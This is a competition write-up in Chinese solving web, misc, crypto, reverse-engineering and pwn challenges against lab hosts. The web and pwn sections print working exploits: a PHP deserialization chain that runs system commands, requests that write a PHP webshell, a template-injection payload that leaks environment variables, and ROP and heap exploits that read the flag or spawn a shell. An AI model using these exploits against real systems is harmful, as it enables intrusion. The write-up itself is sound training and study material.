# 前言
本次混了一个第 7
# web
# web1
H:__destruct---> Hacker:__tostring
exp:
<?php | |
error_reporting(0); | |
class Hacker{ | |
private $exp; | |
private $cmd; | |
public function __toString() | |
{ | |
call_user_func('system', "cat /flag"); | |
} | |
} | |
class A | |
{ | |
public $hacker; | |
public function __toString() | |
{ | |
echo $this->hacker->name; | |
return ""; | |
} | |
} | |
class C | |
{ | |
public $finish; | |
public function __get($value) | |
{ | |
$this->finish->hacker(); | |
echo 'nonono'; | |
} | |
} | |
class E | |
{ | |
public $hacker; | |
public function __invoke($parms1) | |
{ | |
echo $parms1; | |
$this->hacker->welcome(); | |
} | |
} | |
class H | |
{ | |
public $username; | |
public function __destruct() | |
{ | |
$this->welcome(); | |
} | |
public function welcome() | |
{ | |
echo "welcome~ ".$this->username; | |
} | |
} | |
class K | |
{ | |
public $func; | |
public function __call($method,$args) | |
{ | |
call_user_func($this->func,'welcome'); | |
} | |
} | |
class R | |
{ | |
private $method="phpinfo"; | |
private $args; | |
public function welcome() | |
{ | |
if ($this->key === true && $this->finish1->name) { | |
if ($this->finish->finish) { | |
call_user_func_array($this->method,$this->args); | |
} | |
} | |
} | |
} | |
$a=new H(); | |
$a->username=new Hacker(); | |
echo(serialize($a)); |
# web2
用 glob 进行匹配
import string | |
import requests | |
url = "http://172.10.0.5/" | |
path = "backdoor_" | |
zidian="0123456789abcdefghigklmnopqrstorwxyz." | |
flag = path | |
while True: | |
for i in zidian: | |
data = {"filename": "glob://" + flag + i + "*"} | |
#print(data) | |
re = requests.post(url, data=data).text | |
#print() | |
if "yes" in re: | |
flag += i | |
print(flag) | |
break |
数组绕过进行命令执行
http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=1&title[]=shell.php&data[]=%3C?php%20system(%22dir%20/%22);
获取 flag
http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=1&title[]=shell.php&data[]=%3C?php%20system(%22cat%20/flag%22);
# Web-Escape
原题:Archived Challenges - ImaginaryCTF 和这个 Helpful - BONUS,是一样的直接用官网上的 payload 打了
http://172.10.0.5:10000/?username={passhash.__str__.__globals__[app].wsgi_app.__globals__[os].environ}&password=1
flag{d467150b-6e0b-4a9a-96c1-2148c6edcd5f}
# Web-Tera
题目打开
很明确的一个模版注入的题目
# WEB-HTTP
这里打开页面是一个游戏,没什么东西,先扫描一下目录
这里有一个 /swagger-resources 目录这里去找了一下文章
这里找了一下相关文章 Swagger 未授权访问漏洞 - 腾讯云开发者社区 - 腾讯云 (tencent.com)
这里是存在 Swagger 未授权访问漏洞,检索到了一个 /swagger-ui/index.html 目录,这里访问
这里点击 proxy
这里点击 try it out
这里多了一个 url 参数可控
这里换种访问方式
使用 file 协议去访问,发现现实协议无效,这里 p 牛的知识星有说过,这里使用 url:绕过
然后这里显示只能展示 html,使用 #绕过即可
# MISC
# Misc - 我的壁纸
拿到附件用 foremost 分离出三个文件
文本文件
使用 snow 解密
密码:snowday
拿到了一部分
音频文件是无线电,题目上也给了提示使用 Robot 36
然后扫描二维码
中间一段,图片使用 steghide 解
密码是:7hR@1nB0w$
拼接一下即可
# Crypto
# leak rsa
深搜拿到高位,但是出现了很多,说明不是完全正确的
N=73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923 | |
C=71808322808599218331233291542779486534747913572475630198802984648982830332628443972652322590637382696027943799004331488098592525306523343649935216419522329722152742610560398216737030893090641493326477786720839849938277402743820773957184083430369443325368720115515840174745825798187125454448297155036065857691 | |
gift=2223117424030234543005449667053988296724455736030907136592525175314696509716321 | |
from Crypto.Util.number import * | |
PQ = [('', '')] | |
pq_add0=[('0','0'), ('1','1')] | |
pq_add1=[('0','1'), ('1','0')] | |
b_gift='0'+bin(gift)[2:] | |
pq_add2=pq_add1+pq_add0 | |
for i in range(262): | |
pq=[] | |
for p_org, q_org in PQ: | |
if b_gift[i]=='0': | |
for a,b in pq_add0: | |
p_if,q_if=p_org+a,q_org+b | |
p_min,p_max=p_if.ljust(512,'0'),p_if.ljust(512,'1') | |
q_min,q_max=q_if.ljust(512,'0'),q_if.ljust(512,'1') | |
if int(p_min,2) * int(q_min,2) <= N <= int(p_max,2) * int(q_max,2): | |
pq.append((p_if, q_if)) | |
elif b_gift[i] == '1': | |
for a, b in pq_add1: | |
p_if, q_if = p_org + a, q_org + b | |
p_min, p_max = p_if.ljust(512, '0'), p_if.ljust(512, '1') | |
q_min, q_max = q_if.ljust(512, '0'), q_if.ljust(512, '1') | |
if int(p_min, 2) * int(q_min, 2) <= N <= int(p_max, 2) * int(q_max, 2): | |
pq.append((p_if, q_if)) | |
PQ = pq | |
print(PQ) |
我们尝试对一位爆破
from Crypto.Util.number import * | |
D=[] | |
p=[('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000010', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100011'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000011', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100010'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000001010', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101101011'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100010', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000011'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100011', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000010'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000010', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100011'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000011', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100010'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101101011', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000001010'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100010', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000011'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100011', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000010')] | |
for i in range(len(p)): | |
for j in range(2): | |
D.append(int(p[i][j]+'0',2)) | |
D.append(int(p[i][j]+'1',2)) |
放在 copper 里面进行爆破
n=73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923 | |
p=[7532893609209503433401207114936112283562745074605666595854962703328723243192836, 7532893609209503433401207114936112283562745074605666595854962703328723243192837, 11975359106462250866004610445325637689150797603362754225369957476901819007810758, 11975359106462250866004610445325637689150797603362754225369957476901819007810759, 7532893609209503433401207114936112283562745074605666595854962703328723243192838, 7532893609209503433401207114936112283562745074605666595854962703328723243192839, 11975359106462250866004610445325637689150797603362754225369957476901819007810756, 11975359106462250866004610445325637689150797603362754225369957476901819007810757, 7532893609209503433401207114936112283562745074605666595854962703328723243206676, 7532893609209503433401207114936112283562745074605666595854962703328723243206677, 11975359106462250866004610445325637689150797603362754225369957476901819007788758, 11975359106462250866004610445325637689150797603362754225369957476901819007788759, 7532893609209503433401207114936112283562745074605666595854962703328723243206724, 7532893609209503433401207114936112283562745074605666595854962703328723243206725, 11975359106462250866004610445325637689150797603362754225369957476901819007788678, 11975359106462250866004610445325637689150797603362754225369957476901819007788679, 7532893609209503433401207114936112283562745074605666595854962703328723243206726, 7532893609209503433401207114936112283562745074605666595854962703328723243206727, 11975359106462250866004610445325637689150797603362754225369957476901819007788676, 11975359106462250866004610445325637689150797603362754225369957476901819007788677, 11975359106462250866004610445325637689150797603362754225369957476901819007788676, 11975359106462250866004610445325637689150797603362754225369957476901819007788677, 7532893609209503433401207114936112283562745074605666595854962703328723243206726, 7532893609209503433401207114936112283562745074605666595854962703328723243206727, 11975359106462250866004610445325637689150797603362754225369957476901819007788678, 11975359106462250866004610445325637689150797603362754225369957476901819007788679, 7532893609209503433401207114936112283562745074605666595854962703328723243206724, 7532893609209503433401207114936112283562745074605666595854962703328723243206725, 11975359106462250866004610445325637689150797603362754225369957476901819007788758, 11975359106462250866004610445325637689150797603362754225369957476901819007788759, 7532893609209503433401207114936112283562745074605666595854962703328723243206676, 7532893609209503433401207114936112283562745074605666595854962703328723243206677, 11975359106462250866004610445325637689150797603362754225369957476901819007810756, 11975359106462250866004610445325637689150797603362754225369957476901819007810757, 7532893609209503433401207114936112283562745074605666595854962703328723243192838, 7532893609209503433401207114936112283562745074605666595854962703328723243192839, 11975359106462250866004610445325637689150797603362754225369957476901819007810758, 11975359106462250866004610445325637689150797603362754225369957476901819007810759, 7532893609209503433401207114936112283562745074605666595854962703328723243192836, 7532893609209503433401207114936112283562745074605666595854962703328723243192837] | |
pbits=512 | |
for p4 in p: | |
kbits=pbits - p4.nbits() | |
print (p4.nbits()) | |
p4 = p4 << kbits | |
PR.<x> = PolynomialRing(Zmod(n)) | |
f = x + p4 | |
roots = f.small_roots(X=2^kbits,beta=0.5,epsilon=0.01) | |
print(roots) |
拿到一组比较短的就行,与之对应的 p 或 q
p4=11975359106462250866004610445325637689150797603362754225369957476901819007810757 | |
kbits=512-p4.bit_length() | |
p4 = p4 << kbits | |
p=p4+611414793025621783063521676721076724031914595699228956891999095186369770019 | |
n=73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923 | |
q=n//p | |
c=71808322808599218331233291542779486534747913572475630198802984648982830332628443972652322590637382696027943799004331488098592525306523343649935216419522329722152742610560398216737030893090641493326477786720839849938277402743820773957184083430369443325368720115515840174745825798187125454448297155036065857691 | |
d=inverse(65537,(p-1)*(q-1)) | |
print(long_to_bytes(pow(c,d,n))) | |
# b'flag{6eb67115-38b1-4e75-b3fc-de3a9697e565}' |
# SecretShare
前面是 mt19937,因为够 624,可以直接预测随机数,然后构造矩阵解决得到 p,然后正常解 rsa 就行
import re | |
from randcrack import RandCrack | |
from sage.all import matrix, Zmod, inverse_mod | |
from Crypto.Util.number import * | |
with open("output.txt", "rb") as output: | |
f = output.read() | |
def extract_numbers(string): | |
l = r'\d+' | |
numbers = re.findall(l, string) | |
return numbers | |
def get_predict(X): | |
D = [] | |
for i in range(20): | |
for j in range(1024 // 32): | |
T.append((X[i] >> (32 * j)) % 2 ** 32) | |
D = D[-624:] | |
rc = RandCrack() | |
for i in range(624): | |
rc.submit(D[i]) | |
x = rc.predict_getrandbits(1024) | |
return x | |
data = extract_numbers(f) | |
X, R = [], [] | |
for i in range(0, len(data), 2): | |
X.append(int(data[i])) | |
R.append(int(data[i + 1])) | |
X.append(get_predict(X)) | |
R.append(leak) | |
XX = matrix(Zmod(p), 21, 21) | |
for i in range(21): | |
for j in range(21): | |
XX[i, j] = pow(X[j], i, p) | |
R = matrix(Zmod(p), R) | |
A = XX.solve_left(R) | |
secret = ZZ(A.list()[0]) | |
new_p = secret | |
new_q = N // new_p | |
d = inverse_mod(65537, (new_p - 1) * (new_q - 1)) | |
flag = long_to_bytes(pow(C, d, N)) | |
print(flag) |
# re
# Re - 安全编程
puzzle solver 扫一下,发现直接异或 0x80 就能出,当成 misc,属实非预期了。
# Re-babyre
先跑随机数
#include<stdlib.h> | |
#include<iostream> | |
#include<windows.h> | |
using namespace std; | |
int main() { | |
srand(0xdeadc0de); | |
for (int i = 0;i < 32 * 7;++i) | |
printf("0x%x,", rand()); | |
return 0; | |
} |
本来想用 z3 解决的,但是没炸出来,
from z3 import * | |
c=[BitVec("c%d"%i,8) for i in range(12)] | |
s=c[:] | |
p=Solver() | |
rd=[] | |
for k in range(32): | |
for i in range(12): | |
s[i]=(23*s[i]+66)&0xff | |
v5 = (s[3] << 24) | (s[2] << 16) | (s[1] << 8) | s[0] | |
v6 = (s[7] << 24) | (s[6] << 16) | (s[5] << 8) | s[4] | |
v7 = (s[11] << 24) | (s[10] << 16) | (s[9] << 8) | s[8] | |
v11 = (v6 >> 7)&0xffffffff | |
v12 = (rd[k*6+0] + v11)&0xffffffff | |
v13 = ((v6 >> 15) ^ (v6 << 10) | 3)&0xffffffff | |
v5 += v12 + (rd[k*6+1] ^ v13) | |
v5 &=0xffffffff | |
v11 = (v7 >> 7)&0xffffffff | |
v12 = (rd[k*6+2] + v11)&0xffffffff | |
v13 = ((v7 >> 15) ^ (v7 << 10) | 3)&0xffffffff | |
v6 += v12 + (rd[k*6+3] ^ v13) | |
v6&=0xffffffff | |
v11 = (v5 >> 7)&0xffffffff | |
v12 = rd[k*6+4] + v11 | |
v12&=0xffffffff | |
v13 = (v5 >> 15) ^ (v5 << 10) | 3 | |
v13&=0xffffffff | |
v7 += v12 + (rd[k*6+5]^ v13) | |
v7&=0xffffffff | |
s[0]=v5&0xff | |
s[1]=(v5>>8)&0xff | |
s[2]=(v5>>16)&0xff | |
s[3]=(v5>>24)&0xff | |
s[4]=v6&0xff | |
s[5]=(v6>>8)&0xff | |
s[6]=(v6>>16)&0xff | |
s[7]=(v6>>24)&0xff | |
s[8]=v7&0xff | |
s[9]=(v7>>8)&0xff | |
s[10]=(v7>>16)&0xff | |
s[11]=(v7>>24)&0xff | |
p.add(v5==0xA0484D3B) | |
p.add(v6==0x27312854) | |
p.add(v7==0x6DF12135) | |
print(p.check()) |
后来考虑写解密算法,大小端还是比较绕的,前面解完,最后 encrypt1 的解密还是采用的爆破解的
rand=[0x4df2,0x7125,0x3739,0xde6,0x2755,0x7a13,0x7e6a,0x2ea4,0xd66,0x6d41,0x39ff,0x2cc9,0x2f8f,0x233d,0x6bde,0x1fef,0x2f12,0x4018,0x5065,0x194e,0x4555,0x106b,0x575c,0x8e0,0x247c,0x3798,0x2927,0x7dc4,0x463d,0x1352,0xc40,0x45e1,0x1cf0,0x7860,0x3ee5,0x30cb,0x5ae6,0x2c9d,0x190e,0x79ea,0x43fc,0x4244,0xaa2,0x1dd9,0x3d70,0x386a,0x49ea,0x1f0c,0xff3,0x4cc,0x4646,0x7db6,0xfff,0x6acb,0x331f,0x66e9,0x206a,0x43b5,0x3f1c,0x5eff,0x433c,0x1c46,0x4b99,0x6b3a,0x2cbe,0x4b6f,0x3855,0x7ea7,0xcd3,0x6655,0x176a,0x2e48,0x28b,0x359d,0x5d83,0x7071,0x6df6,0xfe7,0x6249,0x6b73,0x1436,0x3d98,0x451e,0x1778,0x49d8,0x49dd,0xa0e,0x37ae,0x1765,0x64ed,0x302,0x6ea8,0xc33,0x3b8e,0x5937,0x7201,0x3381,0x67da,0x4aef,0x2142,0x5fc3,0x5f43,0x7167,0x405,0x403b,0x1d5,0x2308,0x735b,0x74c9,0x2ebb,0x45e1,0x726c,0x1404,0x205,0x2655,0x7a5d,0x5789,0x1fa8,0x2611,0x3d77,0x6294,0x2fc6,0x5742,0x2585,0x56cd,0x7030,0x5804,0x117d,0x2b64,0x7f2a,0x21d,0x1663,0x7a5f,0x436e,0x42eb,0x476b,0x3833,0x1573,0x2f9b,0x495e,0x992,0xdee,0x299c,0x353e,0x2b85,0x1d9a,0x2753,0xe2d,0x21ba,0x5234,0x7511,0x4e8b,0x1f1f,0x6cca,0x242,0x505f,0x5cb0,0x2d36,0xee7,0x14f8,0x528c,0x76e6,0x4d46,0x2fd4,0x74f,0x32de,0x4bdf,0x58c0,0x699c,0x12ff,0x3ba3,0x6941,0x67f9,0x1a89,0x6661,0x4933,0x3ae0,0xfdf,0x6981,0xeb0,0x1512,0x3b8a,0x8f4,0x5533,0x2e2f,0x1881,0x2e6b,0xffd,0x5b84,0x59a7,0x68c7,0x5bb8,0x2b24,0x6896,0x7fd1,0x135b,0x353a,0x419b,0x702c,0x2c4d,0x179d,0x5101,0x6388,0x1dcd,0x4fa5,0x3593,0x7917,0x5791,0x663e,0xc5c,0x7245,0xbad,0x223a,0x29b1,0x17a4,0x4fb7,0x34ec,0x6372,0x6a25,0x5929,0x14f2,0x508c,0x748e,0x5906] | |
randi=0 | |
dict1={} | |
def encrypt1(c): | |
return (23*(c)+66)&0xff | |
for i in range(256): | |
dict1[encrypt1(i)]=i | |
c=[0x48, 0x4d, 0x3b, 0xa0, 0x27, 0x31, 0x28, 0x54, 0x6d, 0xf1, 0x21, 0x35, 0x18, 0x73, 0x6a, 0x4c, 0x71, 0x3b, 0xbd, 0x98, 0xb6, 0x5a, 0x77, 0x2d, 0xb, 0x2b, 0xcb, 0x9b, 0xe4, 0x8a, 0x4c, 0xa9, 0x5c, 0x4f, 0x1b, 0xf1, 0x98, 0x3d, 0x30, 0x59, 0x3f, 0x14, 0xfc, 0x7a, 0xf4, 0x64, 0x2, 0x2b] | |
for ip in range(0,len(c),12): | |
randi = 191 | |
for _ in range(32): | |
getenc=c[ip:ip+12] | |
data=[i for i in getenc] | |
data1=[] | |
for i in range(0,len(data),4): | |
data1.append(int.from_bytes(data[i:i+4],"little")) | |
get = data1 | |
v23 = get[0] >> 7 | |
v24 = rand[randi-1] + v23 | |
v25 = (get[0] >> 15) ^ (get[0] << 10) | 3 | |
data1[2] -= v24 + (rand[randi] ^ v25) | |
data1[2] &= 0xffffffff | |
randi -= 2 | |
v23 = get[2] >> 7 | |
v24 = rand[randi-1] + v23 | |
v25 = (get[2] >> 15) ^ (get[2] << 10) | 3 | |
data1[1] -= v24 + (rand[randi] ^ v25) | |
data1[1] &= 0xffffffff | |
randi -= 2 | |
v23 = get[1] >> 7 | |
v24 = rand[randi-1] + v23 | |
v25 = (get[1] >> 15) ^ (get[1]<< 10) | 3 | |
data1[0] -= v24 + (rand[randi] ^ v25) | |
data1[0]&=0xffffffff | |
randi -= 2 | |
for x in range(3): | |
i1=[i for i in bytes.fromhex(hex(data1[x])[2:].rjust(8,"0"))][::-1] | |
for i2 in range(4): | |
c[ip+4*x+i2]=dict1[i1[i2]] | |
print("".join(map(chr,c))) |
# Re-BadRe
DIE 能扫出来是 64 位程序,但是跑不起来,猜测是 PE 结构有问题,上 CFF Explorer
发现这个 ATOM 段有问题 Raw Address 错误。
这边是对这个 Section 解密
跑起来 dump
发现实际上解密出来了一个 PE 文件,可以看到 PE 头了,然后 dump 下这个节,下面的应该是 PE 重载的过程
载入后发现是个 rc4
解出来就行 flag
# pwn
# PWN-silent
# 程序分析
就是直接溢出,没有开启
canary, 沙箱禁用了execve, 难点就是调用的函数太少需要不断布局控制执行流,刚开始是想用gadget直接修改不用爆破但是没有找到。思路就是利用 read 修改
bss段中残留的libc地址为syscall(并利用爆破),然后利用read控制rax调用write泄露libc打一个orw
# exp
from pwn import * | |
# 设置 libc 和二进制文件 | |
libc = ELF("/home/clown/Desktop/libc-2.27.so") | |
elf = ELF("./silent") | |
# 定义 ROP Gadgets 和地址 | |
ret = 0x4008FD | |
pop_rdi = 0x400963 | |
pop_rsi_r15 = 0x400961 | |
bss1 = 0x601010 | |
bss2 = 0x6010A0 | |
leave = 0x4008FC | |
pop_rsp_3xx = 0x40095D | |
null = 0x602088 | |
bss_libc = 0x601030 - 0x28 | |
def start(p): | |
# 阶段 1:泄漏 libc 地址 | |
payload = b'a' * 0x40 + p64(bss2 - 0x18) + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(bss2 - 0x10) + p64(0) + p64(elf.plt['read']) + p64(leave) | |
p.send(payload) | |
sleep(0.1) | |
# 准备 ROP 链以泄漏 libc 地址 | |
payload = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(bss_libc) + p64(0) + p64(elf.plt['read']) | |
payload += p64(pop_rsp_3xx) + p64(0x6010D0 - 0x18) # 返回到 ROP 链 | |
payload += p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x601038) + p64(0) + p64(elf.plt['read']) | |
payload += p64(pop_rsi_r15) + p64(null) + p64(0) + p64(elf.plt['read']) | |
payload += p64(pop_rsp_3xx) + p64(bss_libc - 0x18) | |
p.send(payload) | |
sleep(0.1) | |
# 触发系统调用以泄漏 libc 地址 | |
payload = p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['alarm']) + p64(0) + b'\xf5\x54\x4A' | |
p.send(payload) | |
sleep(0.1) | |
# 阶段 2:执行 ROP 以打开 / 读取 / 写入文件 | |
payload = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x601068) + p64(0) + p64(elf.plt['read']) | |
p.send(payload) | |
sleep(0.1) | |
# 发送一个空字节来终止读取系统调用 | |
p.send('0') | |
sleep(0.1) | |
try: | |
# 计算 libc 基址 | |
libc_base = u64(p.recvuntil(b'\x7F')[-6:].ljust(8, b'\x00')) - libc.symbols['alarm'] | |
log.info(f'libc_base: {hex(libc_base)}') | |
# 计算 libc 中的 ROP gadgets 和函数地址 | |
pop_rdx = libc_base + 0x1B96 | |
open_addr = libc_base + 0x10FBF0 | |
write_addr = libc_base + 0x1100F0 | |
read_addr = libc_base + 0x110020 | |
flag = 0x601118 | |
# 用于打开 / 读取 / 写入 flag 文件的 ROP 链 | |
payload = p64(pop_rdi) + p64(flag) + p64(pop_rsi_r15) + p64(0) + p64(0) + p64(open_addr) | |
payload += p64(pop_rdi) + p64(3) + p64(pop_rsi_r15) + p64(0x6010A0) + p64(0) + p64(pop_rdx) + p64(0x30) + p64(read_addr) | |
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(0x6010A0) + p64(0) + p64(pop_rdx) + p64(0x30) + p64(write_addr) | |
payload += b"flag\x00\x00\x00" | |
sleep(0.1) | |
p.sendline(payload) | |
p.interactive() | |
except: | |
print('出错了') | |
p.close() | |
return | |
while True: | |
p = remote("172.10.0.8", 9999) | |
start(p) |
# Pwn-Auto_Coffee_machine
本题是一个菜单堆题,存在 UAF 漏洞,可以打 tcache bin attack,也可以打一个非预期,索引为负的漏洞,打 stdout 结构体,io leak 泄露 libc,再打一个 stdin 结构体 任意地址写,修改 atol 的 got 表为 system,最后手写一个 sh 即可
from tools import * | |
context.log_level='debug' | |
p,e,libc=load('pwn',"172.10.0.9:8888") | |
p.sendlineafter(">>>",str(4421)) | |
payload=p64(0x6e7770207473756a)+p64(0x746920) | |
p.sendafter("please input the admin password\n",payload) | |
p.sendlineafter(">>>",str(2)) | |
p.sendlineafter(">>>",str(3)) | |
p.sendlineafter(">>>",str(-107-14+76)) | |
payload=p64(0xfbad1887)+p64(0)*3+b'\x00' | |
p.send(payload) | |
libc_base=recv_libc()-0x1ec980 | |
p.sendlineafter(">>>",str(2)) | |
p.sendlineafter(">>>",str(3)) | |
p.sendlineafter(">>>",str(-107-14+76+2)) | |
payload=p64(0xfbad1800)+p64(0)*6+p64(0x406068)+p64(0x406070)+b'\x00' | |
p.send(payload) | |
p.sendlineafter('>>>',str(3)) | |
p.sendlineafter(">>>",str(1)) | |
p.sendlineafter("input the id of what coffee you want to buy\n",str(1)) | |
p.sendafter("Do you want to add something?Y/N\n",'Y') | |
sys_addr=libc_base+libc.symbols['system'] | |
p.send(p64(sys_addr)) | |
p.sendline("sh\x00") | |
p.interactive() |
